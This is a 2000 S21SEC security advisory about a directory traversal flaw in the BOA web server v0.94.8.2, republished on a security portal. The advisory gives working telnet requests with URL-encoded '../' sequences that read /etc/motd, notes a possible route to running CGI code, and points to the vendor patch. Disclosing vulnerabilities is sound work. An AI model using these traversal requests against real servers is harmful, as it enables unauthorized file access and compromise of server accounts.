[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Vulnerability in BOA web server v0.94.8.2

Title: Vulnerability in BOA web server v0.94.8.2
Released by: S21SEC
Date: 3rd October 2000
Printable version: Click here
###############################################################

ID: S21SEC-005-en

Title: Vulnerability in BOA web server v0.94.8.2

Date: 03/10/2000

Status: Vendor contacted, patch available

Scope: Arbitrary file access

Platforms: Unix

Author: llmora

Location: http://www.s21sec.com/en/avisos/s21sec-005-en.txt

Release: Public

###############################################################



S 2 1 S E C



http://www.s21sec.com



Vulnerability in BOA web server v0.94.8.2





There is a security bug in BOA v0.94.8.2 that allows a malicious

user to access files outside the document root of the web server

as the user the server runs as.



About BOA

---------



Boa is an open source high performance web server for Unix-alike

computers (http://www.boa.org). It does file serving and dynamic

content generation via CGI.



Vulnerability description

-------------------------



- Reading any file in the web server



The boa web server suffers of the well-known "../.." web server

problem. If we request a document from the web server,

using the "../.." technique, we get:



homer:~$ telnet ilf 80

Escape character is '^]'.

GET /../../../../../../../../../../../etc/motd HTTP/1.0



HTTP/1.0 404 Not Found



404 Not Found

404 Not Found

The requested URL /etc/motd was not found on this server. Connection closed by foreign host. homer:~$ So apparently it doesn't work, as boa checks for "/.." in the path. By URL-encoding the "." in the request, we are able to skip the ".." test, allowing us to access the contents of any file the user running the web server has access to: homer:~$ telnet ilf 80 GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2 E/etc/motd HTTP/1.0 HTTP/1.0 200 OK [... the /etc/motd file content is shown] Connection closed by foreign host. homer:~$ If the administrator enables extension based CGI support with a line like this in the boa.conf file: AddType application/x-httpd-cgi cgi then a request for a file ending in .cgi will result in the file being executed with the privileges of the user id running the web server. This file can be placed in any folder throughout the file system, not strictly under the DocumentRoot, and be accessed using the previous bug, leading to the web server account compromise. Affected versions ----------------- This bug has been tested and verified to be present in v0.94.8.2 of the boa web server. Version 0.92 of boa is not affected by this problem. Fix information --------------- The boa development team has released v0.94.8.3 which fixes this vulnerability. Upgrades are available at the vendor website (http://www.boa.org). S21SEC wishes to thank the boa development team for acknowledging the issue and releasing a security patch in a matter of hours. Additional information ---------------------- This vulnerability was found and researched by: Lluis Mora llmora@s21sec.com You can find the latest version of this advisory at: http://www.s21sec.com/en/avisos/s21sec-005-en.txt And other S21SEC advisories at http://www.s21sec.com/en/avisos/






(C) 1999-2000 All rights reserved.